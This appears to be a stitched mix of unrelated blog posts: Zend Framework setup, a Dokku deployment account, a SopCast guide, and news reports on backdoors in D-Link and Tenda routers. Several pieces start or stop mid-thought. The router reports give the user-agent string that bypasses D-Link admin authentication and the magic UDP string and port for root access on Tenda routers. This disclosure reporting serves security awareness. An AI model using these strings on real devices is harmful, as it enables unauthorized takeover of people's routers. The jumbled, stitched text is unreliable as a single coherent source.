Then add a line to the config file (application/configs/application.ini). Since the library name won't be different between stages, I've put it in the base section (production):
1. I had to add something (doesn't matter what) after autoloadernamespaces. If I would have written 'autoloadernamespaces = "Amz_"', this would have yielded errors since an array is expected. By adding the ".amz" your making autoloadernamespaces into an array.
2. Instead of just "Amz" for my class prefix, I've added "Amz_". The reason for this is to avoid that "Amz111_" would also be accepted for my classes.
You might remember that in the virtual host we set up in the previous post, that we set the "APPLICATION_ENV" environment variable to development. Well, it comes into play here as well. APPLICATION_ENV decides what part of the config is loaded, so in our case it's the development part. When later on you set up your production environment, you set the variable to "production" and automatically it will use your production config. This enables you to have the same code on all your environments without the hastle of copying/modifying ini files liek in the old days.
My last infrastructure related post was about an experience of using AppFog and switching to Nodejitsu eventually. But that was not the end. In short: for Likeastore we needed SSL support, it happed that SSL is only available for Nodejitsu business plan, which price is 120 USD. That was simply to much for our small venture.
Long time ago, I realized – constrains are good. This case just proved that. Looking for alternative options, gave really nice results, which I easily could be re-used if you looking for simple deployment solutions.
Heroku
Heroku is good service. Afraid to be mistaken, but that’s probably Heroku who popularized “git-powered” deployments much, ones there deployment script looks like:
> git push heroku master
The rest is all about the service – prepare runtime, deploy code, start web application etc. Besides of that Heroku open-sourced a lot of good stuff, including so called buildpacks, some ready to use scripts that are able to setup the dyno with all required runtime to be able to start application there.
I never seriously used Heroku, though. What I dislike, is pricing. Also, the other people I asked about their satisfaction of using Heroku, was not satisfying much (arguable). We needed more lightweight, easy to change setup.
Digital Ocean
Digital Ocean is very fast growing cloud-computing service. It’s not PaaS (platform as a service) like Heroku, it’s rather IaaS (infrastructure as a service). They are notable for few major things:
Easy of use – the flow from registration for first droplet creation is smooth and clear.
Regions – machines can be fired up for both US and EU, ideal for us.
But again, Digital Ocean is nothing more as great infrastructure. Herding the server is all up to you. I personally was really afraid of that perspective of setting up nginx, configuring firewalls, load-balancing etc., that prevented me to look to Digital Ocean closely. Getting used to deployment procedures with Nodejitsu and Heroku, it’s real pain to deploy app by FTP again and do everything manually.
But lucky chance I noticed Dokku project and that was something really great, explain why later.
Dokku & Docker
So, Dokku is simply amazing hack (or more correctly, combination of diffrent hacks) by Jeff Lindsay. Some initial facts:
Written in Shell script and currently nearly 100 lines of code
Based on Docker
Provides Heroku-like deployment experience
Community-driven
Dokku, can be installed to Ubuntu 13 machine and turn that machine into Heroku-like server. I mean, you can push the code there and Dokku, will fire-up new docker process, deploy code there, start the application, configure nginx and setup environment variables and SSL.
Btw, the time I just looked to Dokku, they missed exactly support of ENV variables and SSL. It was not acceptable for me, without those 2 features. Constraints again, but that gave me ability to contribute the projects and eventually I submitted both features.
Dokku, is very interesting project. First of all, because it based on trendy Docker. Docker is “Virtual-Machine-Based-Deployment” alternative. Deployment on virtual boxes are de-facto standard now and docker is about to change that. Guys from dotCloud open-sourced solution that allows to run isolated processes (containers) – that are like lightweight virtual machines. You can deploy docker on Ubuntu server and then use that as host any kind of applications or databases.
Docker could turn Ubuntu Server to PaaS and Dokku makes great “interface” for that.
Each Dokku piece is very interesting indeed and I hope to blog more about. And Dokku is using Heroku buildbacks, which makes you feel you deal with Heroku, not with your own setup.
Putting Things Together
Digital Ocean and Dokku make a perfect match. As I said above, Digital Ocean is something you can really start quick with. So, what we did is just started up 10$ Ubuntu 13 server and installed Dokku there. In total it took 7 minutes or so. I would not bother you with instructions, cause you find a lot in internet.. but also, assuming that DO + Dokku is a kind of Apple product, that does not require instructions.
First impression was simply amazing. You have everything under control and fill great with “git-powered” deployments. So, after successful try that machine became our staging server and I also fired-up another one for production one.
Now, then we developing features and what to show each other or test, you just need to do following:
> git push deploy-staging feature:master
Counting objects: 7, done.
Delta compression using up to 8 threads.
Compressing objects: 100% (4/4), done.
Writing objects: 100% (4/4), 445 bytes | 0 bytes/s, done.
Total 4 (delta 2), reused 0 (delta 0)remote: -----> Building collector ...
remote: Node.js app detected
remote: -----> Resolving engine versions
remote: Using Node.js version: 0.10.15
remote: Using npm version: 1.2.30
remote: -----> Fetching Node.js binaries
remote: -----> Vendoring node into slug
remote: -----> Installing dependencies with npm
remote: npm WARN package.json likeastore-collector@0.0.2-21 No repository field.
remote: npm http GET https://registry.npmjs.org/mongojs
remote: npm http GET https://registry.npmjs.org/underscore
...
remote: =====> Application deployed:
remote: http://stage-collector.likeastore.com
The time we are ready to release:
> git push deploy-production master
Counting objects: 7, done.
Delta compression using up to 8 threads.
...
remote: =====> Application deployed:
remote: http://collector.likeastore.com
It’s fast and it’s pretty reliable.
For conclusion, I would say that using both Digial Ocean and Dokku was a clear win for Likeastore being released.
A number of D-Link routers reportedly have an issue that makes them susceptible to unauthorized backdoor access.
The researcher Craig, specialized on the embedded device hacking - demonstrated the presence of a backdoor within some DLink routers that allows an attacker to access the administration web interface of network devices without any authentication and view/change its settings.
He found the backdoor inside the firmware v1.13 for the DIR-100 revA. Craig found and extracted the SquashFS file system loading firmware’s web server file system (/bin/webs) into IDA.
Giving a look at the string listing, the Craig's attention was captured by a modified version of thttpd, the thttpd-alphanetworks/2.23, implemented to provide the rights to the administrative interface for the router.
The library is written by Alphanetworks, a spin-off company of D-Link, analyzing it Craig found many custom functions characterized by a name starting with suffix “alpha” including the alpha_auth_check.
The function is invoked to parse http request in the phase of authentication.
"We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request."
Analyzing the parameters passed to the function the researcher was able to reconstruct the authentication flow, the function parses the requested URL and check if it contains the strings “graphic/” or “public/”. “graphic/” or “public/” are sub-directories under the device’s web directory, if the requested URL contains one of them the request is passed without authentication.
Another intriguing detail has been found by Craig that by changing the user-agent in a web browser to “xmlset_roodkcableoj28840ybtide,” a user could bypass the security on the device and get online or control the higher functions of the router.
Craig decided to search the code “xmlset_roodkcableoj28840ybtide” on Google and discovered traces of it only in one Russian forum post from a few years ago. Going deep in its analysis Craig was able to piece together the body of the alpha_auth_check:
int alpha_auth_check(struct http_request_t *request)
// These arguments are probably user/pass or session info
if(check_login(request->0xC, request->0xE0) != 0)
{
return AUTH_OK;
}
}
return AUTH_FAIL;
}
Try to read the string xmlset_roodkcableoj28840ybtide backwards .... It appears as "Edit by 04882 Joel backdoor", very cool.
The worrying part about this vulnerability is how it can be exploited. Anyone connected to the router, whether it's through Ethernet or Wi-Fi, can simply set their browser's user agent string to a specific codeword and then attempt to access the web configuration panel.
Craig extended the results of its discovery to many other D-Link devices affected by the same backdoor, the author searched for the code present in the HTML pages on the entire Internet with the Shodan. He searched for the word "thttpd-alphanetworks/2.23", the modified version of thttpd, retrieving following search results:
After a series of test Craig concluded that the following D-Link devices are likely affected:
• DIR-100
• DI-524
• DI-524UP
• DI-604S
• DI-604UP
• DI-604+
• TM-G5240
The researcher discovered also that Planex routers, based on the same firmware, are affected by the flaw.
• BRL-04UR
• BRL-04CW
D-Link has confirmed that the flaw exists, but has refused to provide comment on how it was inserted into its products. 'D-Link will be releasing firmware updates to address the security vulnerabilities in affected D-Link routers by the end of October,' a company spokesperson explained.
Very intriguing ... What do you think about?
Update (1:43 PM Wednesday, October 16, 2013 GMT): Nmap script is now available for automated scan and identifying the vulnerable D-Link routers, models including - DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240.
Last week Craig Heffner, specialized on the embedded devicehacking exposed a serious backdoor in number ofD-Link routersallows unauthorized backdoor access.
Recently he published his another researcher, Titled 'From China, With Love', exposed that D-Link is not only the vendor who puts backdoors in their products. According to him, China based networking device and equipment manufacturer - TendaTechnology (www.tenda.cn) also added potential backdoors into their Wireless Routers.
He unpacked the software framework update and locate the httpd binary an found that the manufacturer is using GoAhead server, which has been substantially modified.
These routers are protected with standard Wi-Fi Protected Setup (WPS) and WPA encryption key, but still by sending a UDP packet with a special string , an attacker could take over the router.
Routers contain a flaw in the httpd component, as the MfgThread() function spawns a backdoor service that listens for incoming messages containing commands to execute. A remote attacker with access to the local network can execute arbitrary commands with root privileges, after access.
He observed that, attacker just need run the following telnet server command on UDP port 7329, in order of root gain access:
Where, "w302r_mfg" is the magic string to get access via backdoor.
Some of the vulnerable routers are W302R and W330R as well as re-branded models, such as the Medialink MWN-WAPR150N. Other Tenda routers are also possibly affected. They all use the same “w302r_mfg” magic packet string.
Nmap NSE script to test for the backdoored routers – tenda-backdoor.nse is also available for penetration testing.
How to watch P2P stream using SopCast in Ubuntu: an Idiot Guide
13122009
Another step in eliminating Windows completely from my laptop. The last thing being getting a complete astronomy software package (camera control, autoguiding, image processing).
OK, here it is:
1) If you’re using Ubuntu 9.10, the instruction given in this page may save a bit of your working time.
2) If you’re not that lucky (I have 8.04 for instance, and am for some reasons too reluctant to change), get sp-auth from this page. Download it to your home directory, e.g. /home/you
3) Extract the tarball. Open a terminal, and type (don’t forget to press ENTER afterwards ):tar xvfz sp-auth.tgz
4) Change the working directory: cd sp-auth
5) Now try opening a channel. E.g. from the command line: ./sp-sc-auth sop://broker.sopcast.com:3912/69850 3908 8908 > /dev/null & (Get the sop url from the channel you want to view. The number 8908 is the port number you’ll use later, the 3908 is rather arbitrary; I don’t know what it is exactly)
6) If there’s an error message saying something about “libstdc++…” you probably need libstdc++5. Type: sudo apt-get install libstdc++5-3.3-dev from the command line. Retry step 5), you should see no more error messages.
7) Open vlc. From the menu: Applications –> Sound & Video –> VLC media player, or type vlcfrom the command line.
’8) In vlc, open a network stream. From the menu: File –> Open Network Stream, or press Ctrl+N.
9) Select the “HTTP/HTTPS/FTP/MMS” radio button, and type: localhost:8908/tv.asf in the text box. Press OK. You should be able to watch the channel now.
10) If there’s no sound coming out, check vlc settings, make sure that ALSA audio output module is selected. In vlc, edit the settings from the menu: Settings –> Preferences, or press Ctrl+S. Select the “Advanced Options” check box, and look at the options Audio –> Output modules. Select “ALSA audio output” from the drop-down menu. Restart vlc.
This page provides another instruction, if you follow it you won’t need vlc anymore to play the stream. Setup time will be more or less the same however, I think.
doesn’t work too well in the DevCloud. I would get log errors like
[Tue Feb 07 13:06:33 2012] [error] [client 192.168.0.254] Request exceeded the limit of 10 internal redirects due to probable configuration error. Use ‘LimitInternalRecursion’ to increase the limit if necessary. Use ‘LogLevel debug’ to get a backtrace.
Zend Framework (ZF) is a powerful web application framework that is sponsored by Zend Technologies. ZF has lots of features like support for multiple database systems, a nice caching system, a "loosely coupled" architecture (meaning components have minimal dependency on each other), and is enterprise ready as advertised.
Requirements
This tutorial assumes you have installed LAMP stack on your Ubuntu VPS, but it should also work equally well on other Linux distros with LAMP stack. We will be installing with Zend Framework 1 as it is more widely used and has more educational material available.
install PHP5:
apt-get install php5 php5-common
install mysql-server
apt-get install mysql-server
install Zend Framework
apt-get install zend-framework
install phpMyAdmin
apt-get install phpmyadmin
See that link for more detail : Install phpmyadmin and secure it ZF requires that you have enabled mod_rewrite. You can do it by typing this command:
a2enmod rewrite
Installation
After install by apt-get, we should inform php5 interpreter of our Zend library by changing php.ini. It is located in: /etc/php5/apache2:
Creating Your First Application We will begin to create our first project. Change into /var/www directory.
cd /var/www
Let's create our first project named ZendApp. We have a few steps until we can see our project is running, so don't worry if you don't see anything when you visit http://youripadress
zf create project ZendApp
This command creates the related project files for our project "ZendApp". It has several subdirectories and one of them, "public", is where our web server should be pointed to. This is done by changing our settings as the default web root directory. Go to your Apache settings directory which has the settings for the currently enabled sites:
cd /etc/apache2/sites-enabled
You can optionally backup your default settings file with the command:
cp 000-default 000-default.bck
Now change the contents of "000-default":
nano 000-default
with the lines below:
<VirtualHost *:80>
ServerName localhost
DocumentRoot /var/www/ZendApp/public
SetEnv APPLICATION_ENV "development"
<Directory /var/www/ZendApp/public>
DirectoryIndex index.php
AllowOverride All
Order allow,deny
Allow from all
</Directory>
</VirtualHost>